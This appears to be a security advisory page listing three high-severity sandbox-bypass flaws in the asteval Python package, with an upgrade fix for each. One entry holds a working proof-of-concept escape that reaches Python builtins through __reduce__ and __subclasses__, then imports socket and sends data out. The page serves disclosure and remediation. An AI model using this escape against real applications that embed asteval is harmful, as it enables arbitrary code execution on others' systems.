Homepage

asteval@0.9.13 vulnerabilities

Safe, minimalistic evaluator of python expression using ast module

  • latest version

    1.0.6

  • latest non vulnerable version

    1.0.6

  • first published

    13 years ago

  • latest version published

    3 months ago

  • licenses detected

  • View asteval package health on Snyk Advisor  (opens in a new tab)
    • Go back to all versions of this package
    Report a new vulnerability Found a mistake?

    Direct Vulnerabilities

    Known vulnerabilities in the asteval package. This does not include vulnerabilities belonging to this package’s dependencies.

    How to fix?

    Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.

    Fix for free
    VulnerabilityVulnerable Version
    • H
    Exposed Dangerous Method or Function

    asteval is a Safe, minimalistic evaluator of python expression using ast module

    Affected versions of this package are vulnerable to Exposed Dangerous Method or Function through the on_formattedvalue function. An attacker can manipulate the value of the string used in the dangerous call fmt.format(__fstring__=val) to access protected attributes by intentionally triggering an AttributeError exception. The attacker can then catch the exception and use its obj attribute to gain arbitrary access to sensitive or protected object properties.

    How to fix Exposed Dangerous Method or Function?

    Upgrade asteval to version 1.0.6 or higher.

    [,1.0.6)
    • H
    Exposed Dangerous Method or Function

    asteval is a Safe, minimalistic evaluator of python expression using ast module

    Affected versions of this package are vulnerable to Exposed Dangerous Method or Function stems from the library's attribute access verification method, specifically within the on_attribute node handler. The handler is intended to block access to sensitive Python dunder methods by checking against a list of unsafe attributes and attribute patterns. However, due to a flaw in the implementation, an attacker can manipulate the attribute access mechanism by altering the attribute name during runtime, thereby bypassing the safety checks and executing arbitrary code.

    How to fix Exposed Dangerous Method or Function?

    Upgrade asteval to version 1.0.6 or higher.

    [,1.0.6)
    • H
    Sandbox Escape

    asteval is a Safe, minimalistic evaluator of python expression using ast module

    Affected versions of this package are vulnerable to Sandbox Escape. It is possible to escape the asteval sandbox using reduce and reduce_ex.

    PoC

    #!/usr/bin/env python3
# asteval "sandbox" escape PoC
# Ross Bradley

import asteval

user_input = '''
# reduce the asteval.Interpreter._printer function, returning a tuple
red = print.__reduce__()
print(red)

# red[0] == getattr, red[1][0] == asteval.Interpreter instance)
#  this is the crux of the issue - access to getattr breaks all security assumptions allowing us to access props we shouldn't be able to

# give them nice names to make the following code a little clearer
getattr = red[0]
inst = red[1][0]

# get the class for the asteval.Interpreter instance
cls = getattr(inst, '__class__')

# get an object instance from the class
obj = getattr(cls, '__base__')
subclasses = getattr(obj, '__subclasses__')

# find the catch_warnings type
cw = [c for c in subclasses() if c.__name__ == 'catch_warnings'][0]

# fetch the reference to builtins from the catch_warnings type
bi = cw()._module.__builtins__

# import socket (wait, what?)
socket = bi['__import__']('socket')

# do socket things
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('localhost', 1234))
s.send(b'arbitrary code execution')
s.close()
'''

interpreter = asteval.Interpreter()
interpreter.eval(user_input)

    How to fix Sandbox Escape?

    Upgrade asteval to version 0.9.23 or higher.

    [,0.9.23)
    Go back to all versions of this package